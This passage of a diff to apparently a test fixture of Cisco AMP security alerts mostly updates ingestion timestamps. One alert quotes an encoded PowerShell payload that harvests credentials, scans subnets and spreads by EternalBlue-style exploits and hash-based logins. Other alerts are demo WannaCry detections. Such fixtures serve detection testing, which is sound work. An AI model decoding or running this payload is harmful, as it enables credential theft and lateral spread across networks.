rAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==\",\"parent_app\":\"WmiPrvSE.exe\",\"parent_app_path\":\"C:\\\\Windows\\\\System32\\\\wbem\",\"parent_pid\":2236,\"parent_puid\":132461352663910600,\"parent_user\":\"SYSTEM\",\"parent_user_sid\":\"010100000000000512000000\",\"pid\":10724,\"puid\":132465072105597400,\"ts\":1602033881727175700,\"user\":\"user@testdomain.com\",\"user_sid\":\"010100000000000512000000\"}}],\"limited\":false,\"matched\":1},\"schema\":\"endpoint\",\"schema_epoch\":2,\"sig_id\":20190517123456,\"sig_rev\":5},\"detection\":\"apde:20190517123456\",\"end_ts\":1610640884,\"engine\":\"apde\",\"id\":\"d2616Ab846\",\"name\":\"WMIPRVSE Launched Encoded Powershell Command\",\"observables\":{\"file\":[{\"md5\":\"a575a7610e5f003cc36df39e07c4ba7d\",\"name\":\"powershell.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"properties\":{\"copyright\":\"© Microsoft Corporation. All rights reserved.\",\"file_version\":\"10.0.14409.1005\",\"product\":\"Microsoft® Windows® Operating System\",\"product_version\":\"10.0.14409.1005\"},\"sha1\":\"88e7cdc0b75364418e11b2c53f772085f1b61d1e\",\"sha256\":\"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218\",\"size\":443392,\"type_id\":1},{\"md5\":\"d683c112190f4b4c6d477d693ee88e35\",\"name\":\"WmiPrvSE.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\wbem\",\"properties\":{\"copyright\":\"© Microsoft Corporation. All rights reserved.\",\"file_version\":\"10.0.14409.1005\",\"product\":\"Microsoft® Windows® Operating System\",\"product_version\":\"10.0.14409.1005\"},\"sha1\":\"67858ead93feed62c0b1865369840e6e8086f53b\",\"sha256\":\"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334\",\"size\":425984,\"type_id\":1}]},\"remediated\":false,\"severity\":\"medium\",\"silent\":false,\"start_ts\":1610640884,\"tactics\":[\"TA0002\",\"TA0005\",\"TA0008\"],\"type\":\"activity\",\"normalized\":{\"observables\":{\"file\":{\"name\":[\"powershell.exe\",\"wmiprvse.exe\"],\"path\":[\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\",\"c:\\\\windows\\\\system32\\\\wbem\"]}},\"name\":\"wmiprvse launched encoded powershell command\"},\"ts\":1610640884},\"tactics\":[\"TA0002\",\"TA0005\",\"TA0008\"]}}", "code": "553648222", "kind": "alert", @@ -2655,7 +2655,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010792400Z", + "ingested": "2021-12-14T14:40:52.874149281Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":717000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204897366867969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260893", "kind": "alert", @@ -2731,7 +2731,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010796400Z", + "ingested": "2021-12-14T14:40:52.874149625Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260893", "kind": "alert", @@ -2807,7 +2807,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010801700Z", + "ingested": "2021-12-14T14:40:52.874149968Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229327140847665\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260893", "kind": "alert", @@ -2883,7 +2883,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010807200Z", + "ingested": "2021-12-14T14:40:52.874150449Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":639000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204897366867977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260893", "kind": "alert", @@ -2965,7 +2965,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010812400Z", + "ingested": "2021-12-14T14:40:52.874150868Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831755\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648147", "kind": "alert", @@ -3045,7 +3045,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010817700Z", + "ingested": "2021-12-14T14:40:52.874151221Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831754\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648147", "kind": "alert", @@ -3125,7 +3125,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010823Z", + "ingested": "2021-12-14T14:40:52.874151570Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":873000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831753\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"qeriuwjhrf\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\qeriuwjhrf\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648147", "kind": "alert", @@ -3205,7 +3205,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010828300Z", + "ingested": "2021-12-14T14:40:52.874151922Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":732000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419229327140847658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648147", "kind": "alert", @@ -3285,7 +3285,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010833700Z", + "ingested": "2021-12-14T14:40:52.874152284Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":717000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204897366867969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648147", "kind": "alert", @@ -3365,7 +3365,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010839Z", + "ingested": "2021-12-14T14:40:52.874152633Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective 